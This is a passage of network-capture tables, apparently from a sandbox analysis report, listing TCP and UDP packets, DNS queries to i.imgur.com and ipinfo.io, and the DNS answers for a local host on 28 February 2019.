Feb 28, 2019 14:46:11.424060106 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424076080 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424093008 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424125910 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424144030 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424160957 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424180031 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424197912 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424220085 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424237967 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424257040 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424274921 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424293995 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424312115 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424330950 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424349070 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424366951 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424386024 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424401045 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.424412012 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424429893 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424448013 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424465895 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424483061 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424500942 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424520016 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424536943 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424555063 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424572945 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424590111 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424612999 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424632072 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424639940 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.424652100 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424669981 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424686909 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424705029 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424721956 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424740076 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424757004 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424774885 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424793005 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424810886 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424819946 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.424854994 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424874067 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424890995 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424911022 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424927950 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424946070 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424957991 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.424963951 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424981117 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.424998999 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425015926 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425035000 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425051928 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425081015 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425108910 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425122976 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.425127983 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425143957 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425162077 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425183058 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425209045 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425226927 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425245047 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425261974 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.425272942 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425291061 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425323009 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425340891 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425357103 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425374985 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425390959 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.425393105 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425411940 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425431013 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425481081 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425499916 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425518036 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425548077 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425551891 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.425566912 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425585032 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425602913 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425618887 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425637007 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425653934 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425671101 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425685883 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.425689936 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425708055 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425724983 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425741911 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425771952 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425790071 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425806999 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425832987 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.425843000 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425862074 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425882101 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425899029 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425916910 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425944090 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425961018 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.425978899 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.425997019 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426013947 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426032066 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426049948 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426079035 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426096916 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426112890 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.426156044 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426173925 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426191092 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426230907 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426249981 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426259041 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.426268101 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426286936 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426304102 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426321030 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426338911 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426354885 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.426393032 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.426980972 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.428419113 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428441048 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428457975 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428474903 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428493977 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428512096 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428529024 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428528070 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.428546906 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428580046 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428597927 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428639889 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428658009 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428684950 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.428698063 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428719044 CET	443	49232	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.428853989 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.432187080 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432219028 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432235956 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432251930 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432281971 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432303905 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432322979 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432342052 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432349920 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.432358027 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432378054 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432395935 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432425022 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432466030 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432486057 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432506084 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.432509899 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432529926 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432549000 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432568073 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432585955 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432604074 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432621956 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432641029 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432658911 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432661057 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.432677984 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432696104 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432725906 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432744980 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432763100 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432785034 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432787895 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.432802916 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432821989 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432840109 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432857990 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432879925 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432898998 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432917118 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432926893 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.432954073 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432972908 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.432991028 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433007956 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433026075 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433037043 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.433043957 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433073044 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433092117 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433130980 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433150053 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433156013 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.433168888 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433217049 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433235884 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433259010 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433276892 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433295012 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433312893 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433321953 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.433331013 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433348894 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433367014 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433384895 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433408022 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433427095 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433439016 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.433444977 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433463097 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433480978 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433499098 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433516979 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433535099 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433552027 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433558941 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.433569908 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433588028 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433609962 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433628082 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433645964 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433664083 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433676958 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.433681965 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433700085 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433717966 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433768988 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433788061 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433794022 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.433805943 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433825016 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433841944 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433860064 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433876038 CET	443	49231	151.101.36.193	192.168.1.16
Feb 28, 2019 14:46:11.433907986 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.434798956 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:11.436899900 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:21.621032000 CET	55067	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:46:21.633205891 CET	53	55067	8.8.8.8	192.168.1.16
Feb 28, 2019 14:46:21.634639978 CET	49233	443	192.168.1.16	216.239.32.21
Feb 28, 2019 14:46:21.646305084 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:21.646461964 CET	49233	443	192.168.1.16	216.239.32.21
Feb 28, 2019 14:46:21.647768974 CET	49233	443	192.168.1.16	216.239.32.21
Feb 28, 2019 14:46:21.659245968 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:21.675448895 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:21.675498009 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:21.675646067 CET	49233	443	192.168.1.16	216.239.32.21
Feb 28, 2019 14:46:21.676141024 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:21.697348118 CET	49233	443	192.168.1.16	216.239.32.21
Feb 28, 2019 14:46:21.715456009 CET	64117	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:46:21.722985983 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:21.727161884 CET	53	64117	8.8.8.8	192.168.1.16
Feb 28, 2019 14:46:21.735399961 CET	49233	443	192.168.1.16	216.239.32.21
Feb 28, 2019 14:46:21.737760067 CET	49234	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:21.749730110 CET	443	49234	216.239.34.21	192.168.1.16
Feb 28, 2019 14:46:21.749984026 CET	49234	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:21.750902891 CET	49234	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:21.762813091 CET	443	49234	216.239.34.21	192.168.1.16
Feb 28, 2019 14:46:21.778541088 CET	443	49234	216.239.34.21	192.168.1.16
Feb 28, 2019 14:46:21.778578997 CET	443	49234	216.239.34.21	192.168.1.16
Feb 28, 2019 14:46:21.778765917 CET	49234	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:21.779289007 CET	443	49234	216.239.34.21	192.168.1.16
Feb 28, 2019 14:46:21.786957979 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:21.806520939 CET	49234	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:21.832253933 CET	443	49234	216.239.34.21	192.168.1.16
Feb 28, 2019 14:46:21.869841099 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:21.925698996 CET	49234	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:21.978389025 CET	443	49234	216.239.34.21	192.168.1.16
Feb 28, 2019 14:46:22.058960915 CET	443	49234	216.239.34.21	192.168.1.16
Feb 28, 2019 14:46:22.085437059 CET	443	49233	216.239.32.21	192.168.1.16
Feb 28, 2019 14:46:22.085597038 CET	49233	443	192.168.1.16	216.239.32.21
Feb 28, 2019 14:46:22.256006956 CET	49234	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:22.986044884 CET	49230	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:22.986655951 CET	49232	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:22.987070084 CET	49234	443	192.168.1.16	216.239.34.21
Feb 28, 2019 14:46:22.998363972 CET	49229	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:22.998770952 CET	49231	443	192.168.1.16	151.101.36.193
Feb 28, 2019 14:46:22.999201059 CET	49233	443	192.168.1.16	216.239.32.21

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 28, 2019 14:45:31.526434898 CET	51176	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:31.552546024 CET	53	51176	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:37.062233925 CET	49810	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:37.078453064 CET	53	49810	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:37.307703972 CET	55151	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:37.319794893 CET	53	55151	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:37.360723972 CET	53216	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:37.387768030 CET	53	53216	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:38.089452028 CET	49792	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:38.237248898 CET	53	49792	8.8.8.8	192.168.1.16
Feb 28, 2019 14:45:38.248636007 CET	50672	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:45:38.260689020 CET	53	50672	8.8.8.8	192.168.1.16
Feb 28, 2019 14:46:09.605091095 CET	54414	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:46:09.636219025 CET	53	54414	8.8.8.8	192.168.1.16
Feb 28, 2019 14:46:09.649728060 CET	61734	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:46:09.681889057 CET	53	61734	8.8.8.8	192.168.1.16
Feb 28, 2019 14:46:21.621032000 CET	55067	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:46:21.633205891 CET	53	55067	8.8.8.8	192.168.1.16
Feb 28, 2019 14:46:21.715456009 CET	64117	53	192.168.1.16	8.8.8.8
Feb 28, 2019 14:46:21.727161884 CET	53	64117	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 28, 2019 14:45:31.526434898 CET	192.168.1.16	8.8.8.8	0xda2f	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)
Feb 28, 2019 14:45:37.062233925 CET	192.168.1.16	8.8.8.8	0x2dde	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:09.605091095 CET	192.168.1.16	8.8.8.8	0x9902	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:09.649728060 CET	192.168.1.16	8.8.8.8	0x3cdc	Standard query (0)	i.imgur.com	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.621032000 CET	192.168.1.16	8.8.8.8	0x4f68	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.715456009 CET	192.168.1.16	8.8.8.8	0xdace	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 28, 2019 14:45:31.552546024 CET	8.8.8.8	192.168.1.16	0xda2f	No error (0)	i.imgur.com	prod.imgur.map.fastlylb.net		CNAME (Canonical name)	IN (0x0001)
Feb 28, 2019 14:45:31.552546024 CET	8.8.8.8	192.168.1.16	0xda2f	No error (0)	prod.imgur.map.fastlylb.net		151.101.36.193	A (IP address)	IN (0x0001)
Feb 28, 2019 14:45:37.078453064 CET	8.8.8.8	192.168.1.16	0x2dde	No error (0)	ipinfo.io		216.239.34.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:45:37.078453064 CET	8.8.8.8	192.168.1.16	0x2dde	No error (0)	ipinfo.io		216.239.38.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:45:37.078453064 CET	8.8.8.8	192.168.1.16	0x2dde	No error (0)	ipinfo.io		216.239.36.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:45:37.078453064 CET	8.8.8.8	192.168.1.16	0x2dde	No error (0)	ipinfo.io		216.239.32.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:09.636219025 CET	8.8.8.8	192.168.1.16	0x9902	No error (0)	i.imgur.com	prod.imgur.map.fastlylb.net		CNAME (Canonical name)	IN (0x0001)
Feb 28, 2019 14:46:09.636219025 CET	8.8.8.8	192.168.1.16	0x9902	No error (0)	prod.imgur.map.fastlylb.net		151.101.36.193	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:09.681889057 CET	8.8.8.8	192.168.1.16	0x3cdc	No error (0)	i.imgur.com	prod.imgur.map.fastlylb.net		CNAME (Canonical name)	IN (0x0001)
Feb 28, 2019 14:46:09.681889057 CET	8.8.8.8	192.168.1.16	0x3cdc	No error (0)	prod.imgur.map.fastlylb.net		151.101.36.193	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.633205891 CET	8.8.8.8	192.168.1.16	0x4f68	No error (0)	ipinfo.io		216.239.32.21	A (IP address)	IN (0x0001)
Feb 28, 2019 14:46:21.633205891 CET	8.8.8.8	192.168.1.16	0x4f68	No error (0)	ipinfo.io		216.239.38.21	A (IP address)	IN (0x0001)
